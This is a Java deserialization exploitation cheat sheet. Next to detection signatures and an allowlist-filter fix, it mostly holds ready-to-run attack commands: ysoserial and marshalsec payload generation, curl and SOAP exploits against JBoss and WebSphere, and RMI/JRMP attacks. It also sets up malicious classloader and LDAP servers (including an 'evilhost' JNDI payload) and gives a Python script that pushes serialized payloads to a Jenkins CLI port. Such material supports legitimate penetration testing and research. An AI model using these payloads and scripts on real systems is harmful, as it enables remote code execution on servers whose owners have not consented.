Java Deserialization

Java Unmarshaller Security

In-depth blog post on the WebLogic, WebSphere, JBoss, Jenkins, OpenNMS exploits
Java Deserialization Cheat Sheet
Encoding Payloads to exfil data

Detecting Java Serialization:

  • Hex data begins with AC ED 00 05
  • Base64 data begins with rO0AB
  • Content Type is application/x-java-serialized-object
  • gzip data begins with H4sIAAAAAAAAAJ
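To check a captured request body for the four signs above, here is an added example (not part of the original page): a small Java 11+ class whose detect() method reports which form was found, exercised on constructed sample bytes in main().

```java
import java.io.*;
import java.nio.charset.StandardCharsets;
import java.util.*;
import java.util.zip.*;

public class JavaSerialDetector {
    // STREAM_MAGIC 0xACED followed by STREAM_VERSION 0x0005: the first four bytes of every stream
    static final byte[] MAGIC = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};

    static boolean hasMagic(byte[] d) {
        return d != null && d.length >= 4 && Arrays.equals(Arrays.copyOf(d, 4), MAGIC);
    }

    static byte[] tryBase64(byte[] d) {
        try { return Base64.getDecoder().decode(new String(d, StandardCharsets.US_ASCII).trim()); }
        catch (IllegalArgumentException e) { return null; }   // not valid base64
    }

    static byte[] tryGunzip(byte[] d) {
        if (d.length < 2 || (d[0] & 0xFF) != 0x1F || (d[1] & 0xFF) != 0x8B) return null;
        try (GZIPInputStream in = new GZIPInputStream(new ByteArrayInputStream(d))) {
            return in.readNBytes(4);   // only the first four decompressed bytes are needed
        } catch (IOException e) { return null; }
    }

    // Returns how a serialized stream was recognised, or null if none of the four signs match.
    // startsWith() also covers "application/x-java-serialized-object; class=..." variants.
    static String detect(byte[] body, String contentType) {
        if (contentType != null && contentType.toLowerCase().startsWith("application/x-java-serialized-object"))
            return "content-type";
        if (hasMagic(body)) return "raw";                         // AC ED 00 05
        if (hasMagic(tryGunzip(body))) return "gzip";             // gzip header, H4sI... once base64-encoded
        byte[] decoded = tryBase64(body);
        if (hasMagic(decoded)) return "base64";                   // rO0AB...
        if (decoded != null && hasMagic(tryGunzip(decoded))) return "base64+gzip";
        return null;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a genuine stream header followed by a fragment, not a complete object
        byte[] raw = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05, 0x73, 0x72, 0x00, 0x0E};
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (GZIPOutputStream gz = new GZIPOutputStream(bos)) { gz.write(raw); }
        byte[] gzipped = bos.toByteArray();
        System.out.println("raw body:           " + detect(raw, null));
        System.out.println("base64 body:        " + detect(Base64.getEncoder().encode(raw), null));
        System.out.println("gzip body:          " + detect(gzipped, null));
        System.out.println("base64+gzip body:   " + detect(Base64.getEncoder().encode(gzipped), null));
        System.out.println("json body:          " + detect("{\"user\":\"alice\"}".getBytes(StandardCharsets.UTF_8), "application/json"));
    }
}
```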

Where Serialization is Used:

  • In HTTP requests – Parameters, ViewState, Cookies, you name it.
  • RMI – The extensively used Java RMI protocol is 100% based on serialization
  • RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects
  • JMX – Again, relies on serialized objects being shot over the wire
  • Custom Protocols – Sending and receiving raw Java objects is the norm – which we’ll see in some of the exploits to come

Finding Gadgets Manually

If a class on the classpath implements one of these callbacks, deserialized data can trigger its code and be used to exploit the server.

Callbacks that are invoked during deserialization:

  • readObject()
  • readExternal()
  • readResolve()
  • readObjectNoData()
  • validateObject()
  • finalize()

Find Java Classes with GadgetProbe

https://github.com/BishopFox/GadgetProbe

Find Gadget Chains with Gadget Inspector

Finding Chains in Android files:

>>> java -Xmx2G -jar /opt/Hacking/Web/gadget-inspector-all.jar ./edge-dex2jar.jar
>>> cat gadget-chains.txt
org/apache/log4j/pattern/LogEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
  org/apache/log4j/pattern/LogEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
  java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

org/apache/log4j/spi/LoggingEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
  org/apache/log4j/spi/LoggingEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
  java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

Find Jars in ClassPath with EnumJavaLibs

https://github.com/redtimmy/EnumJavaLibs

./getPopularJars.py 20 | while read x; do wget --quiet -P ~/.serially/jars $x; sleep 5; done

How to Fix

Look-Ahead Checks: use a whitelist to validate the class of each object before it is instantiated, so only classes that are explicitly allowed can be deserialized.
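An added example (not from the page) tying the callbacks listed under Finding Gadgets Manually to this fix: a harmless class whose readObject() runs during deserialization, and a JEP 290 ObjectInputFilter whitelist that rejects the class before that callback can fire. It assumes Java 9+; the class name and the allowed-class list are illustrative.

```java
import java.io.*;
import java.util.Set;

public class LookAheadDemo {
    // Harmless stand-in for a gadget class: its readObject() callback runs while the
    // stream is parsed, before the caller ever receives the result.
    static class CallbackBean implements Serializable {
        private static final long serialVersionUID = 1L;
        String name = "demo";
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            System.out.println("readObject() callback fired for " + name);
        }
    }

    // Look-ahead check: only classes on the whitelist may be instantiated; anything else
    // is rejected before its constructor or callbacks can run. Illustrative list.
    static final Set<String> ALLOWED = Set.of("java.lang.String", "java.lang.Integer");

    static ObjectInputFilter allowlistFilter() {
        return info -> {
            if (info.serialClass() == null) return ObjectInputFilter.Status.UNDECIDED; // depth/refs-only check
            return ALLOWED.contains(info.serialClass().getName())
                    ? ObjectInputFilter.Status.ALLOWED : ObjectInputFilter.Status.REJECTED;
        };
    }

    static Object deserialize(byte[] data, boolean withFilter) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            if (withFilter) in.setObjectInputFilter(allowlistFilter());  // must be set before readObject()
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(new CallbackBean()); }
        byte[] data = bos.toByteArray();
        deserialize(data, false);          // unfiltered: the callback fires
        try {
            deserialize(data, true);       // filtered: InvalidClassException, callback never runs
        } catch (InvalidClassException e) {
            System.out.println("Rejected: " + e.getMessage());
        }
    }
}
```

Rejections made by such a filter are reported by the JDK with the same ObjectInputFilter REJECTED log message quoted in the JRMPClient section.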

Bypasses

SerialKillerBypassGadgetCollection

Payloads

Generating Payloads with ysoserial

Download the jar file here

Examples:

java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
nc 10.10.10.10 1099 < groovypayload.bin

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

java -jar ysoserial.jar URLDNS https://test.example.com

Generating Payloads with marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF0 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF3 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMFX -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Burlap -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Java -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JsonIO -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JYAML -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Kryo -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.KryoAltStrategy -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Red5AMF0 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Red5AMF3 -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.SnakeYAML -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream -a
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.YAMLBeans -a

Generating Payloads with jexboss

Java Deserialization Exploitation Tool

DNS Lookup Example:

python2 jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns random.burpdomain.com

Jenkins Exploit using JexBoss:

python2 jexboss.py -u http://vulnerable_java_app/jenkins --jenkins

Apache Struts2 Vulnerabilities (CVE-2017-5638):

python2 jexboss.py -u http://vulnerable_java_app/path.action --struts2

Exploiting JBoss

Paths to Check:

  • /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
  • /web-console/ServerInfo.jsp
  • /invoker/JMXInvokerServlet
  • /invoker/readonly
  • /invoker/
  • /
  • /admin-console/

JBoss Exploit Example:

java -jar /opt/Hacking/Web/ysoserial-master-30099844c6-1.jar CommonsCollections1 id | curl -H "Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue" --data-binary @- -X POST -vvv http://test.com:8080/invoker/JMXInvokerServlet

Remote Class Loading Exploit

Create Payload:

java -jar ysoserial.jar C3P0 http://127.0.0.1:8080/:ExportObject > payload.bin

Setup Server:

>>> git clone https://github.com/sciccone/evil-remote-classloader
>>> java -jar evil-remote-classloader/output.jar -l 127.0.0.1 -p 8080 -c "id>/tmp/rce"
[+] Remote classloader configured.
[+] Listening on http:127.0.0.1:8080 - Class name: ExportObject

JNDI Lookup Exploitation

Create Payload:

java -jar ysoserial.jar SpringJta "ldap://evilhost:1389/ExportObject" > payload.bin

Setup Server:

>>> git clone https://github.com/sciccone/evil-ldap-service
>>> java -jar evil-remote-classloader/output.jar -l 127.0.0.1 -lp 1389 -p 8080 -c "id>/tmp/rce"

DNS Resolution Exploitation

Create Payload:

java -jar ysoserial.jar URLDNS "http://<random>.burp.example.com" > payload.bin

Get Classes to use:
GadgetProbe

JRMPClient Exploitation

Create Payload:

java -jar ysoserial.jar JRMPClient 127.0.0.1:9090 > payload.bin

Setup Server:

java -jar ysoserial.jar ysoserial.exploit.JRMPListener 9090 CommonsCollections4 "id>/tmp/rce"

NOTE: If you receive an error similar to the one below, the class has been rejected by the serialization filter (ObjectInputFilter) of the running JDK.

Mar 09, 2020 5:58:50 PM java.io.ObjectInputStream filterCheck
INFO: ObjectInputFilter REJECTED: class java.util.PriorityQueue, array length: -1, nRefs: 2, depth: 1, bytes: 124, ex: n/a

WebLogic Exploit

#!/usr/bin/env python3
# usage: ./jenkins.py URL /path/to/payload
from urllib.parse import urlparse
import socket, sys, requests
import base64

url = urlparse(sys.argv[1])
payload_file = sys.argv[2]

# Query Jenkins over HTTP to find what port the CLI listener is on
r = requests.get("{scheme}://{netloc}".format(scheme=url.scheme, netloc=url.netloc))
cli_port = int(r.headers['X-Jenkins-CLI-Port'])

# Open a socket to the CLI port (hostname only: netloc may carry the HTTP port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (url.hostname, cli_port)
print(f"Connecting to {url.hostname} port {cli_port}")
sock.connect(server_address)

# Send headers: 2-byte big-endian length (0x0014 = 20) followed by the protocol name
headers = b'\x00\x14Protocol:CLI-connect'
print(f'Sending "{headers}"')
sock.send(headers)
data = sock.recv(1024)
#print(sys.stderr, 'received "%s"' % data)
data = sock.recv(1024)
#print(sys.stderr, 'received "%s"' % data)

# Read the serialized payload and wrap it in the remoting capability preamble
payloadObj = open(payload_file, 'rb').read()
payload_b64 = base64.b64encode(payloadObj)
payload = b"<===[JENKINS REMOTING CAPACITY]===>"
payload += payload_b64
# trailing bytes: the hex value is not recoverable from this page
payload += bytes.fromhex("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")
print('sending payload...')
'''outf = open('payload.tmp','w')
outf.write(payload)
outf.close()'''
sock.send(payload)

Websphere-Soap-Exploit

Example Request:

echo -e "<?xml version='1.0' encoding='UTF-8'?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.1\" ns0:JMXMessageVersion=\"1.2.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$(java -jar /opt/Hacking/Web/ysoserial-master-30099844c6-1.jar CommonsCollections1 id | base64)</objectname>\n<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>\n</ns1:getAttribute>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>" | curl -H "Content-Type: text/xml; charset=utf-8" -H 'SOAPAction: "urn:AdminService"' --data-binary @- -X POST -vvv https://test.com:8880/

RMI Exploiting

Introduction to Java RMI with examples
- https://www.geeksforgeeks.org/remote-method-invocation-in-java/
- https://mkyong.com/java/java-rmi-distributed-objects-example/
Very well written research on how to attack Java RMI
- https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services/
- https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/
- https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf
Latest bypass gadget for the RMI registry whitelist (fixed in JDK8u241)
- https://mogwailabs.de/blog/2020/02/an-trinhs-rmi-registry-bypass/
- https://www.youtube.com/watch?v=tj6MdgfjQTU

Enumerate Classes with BaRMIe:

java -jar BaRMIe_v1.01.jar -enum 10.0.0.1 1099

Attack Service:

java -jar BaRMIe_v1.01.jar -attack 10.0.0.1 1099

Attack RMI with ysoserial:

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 10.0.0.1 1099 CommonsBeanutils1 "touch /tmp/rce"

Attack JRMP with ysoserial:

java -cp ysoserial.jar ysoserial.exploit.JRMPClient 10.0.0.1 1099 CommonsBeanutils1 "touch /tmp/rce"

JMX Exploitation

https://github.com/mogwailabs/mjet

JMS Exploitation

https://github.com/matthiaskaiser/jmet

AMQP Exploitation

XMLEncoder (XML)

XStream (XML/JSON/various)

Kryo (binary)

Hessian/Burlap (binary/XML)

Castor (XML)

json-io (JSON)

Jackson (JSON)

Fastjson (JSON)

Genson (JSON)

Red5 IO AMF (AMF)

Apache Flex BlazeDS (AMF)

Flamingo AMF (AMF)

GraniteDS (AMF)

WebORB for Java (AMF)

SnakeYAML (YAML)

jYAML (YAML)

YamlBeans (YAML)

“Safe” deserialization

JMX

siberas JMX exploitation toolkit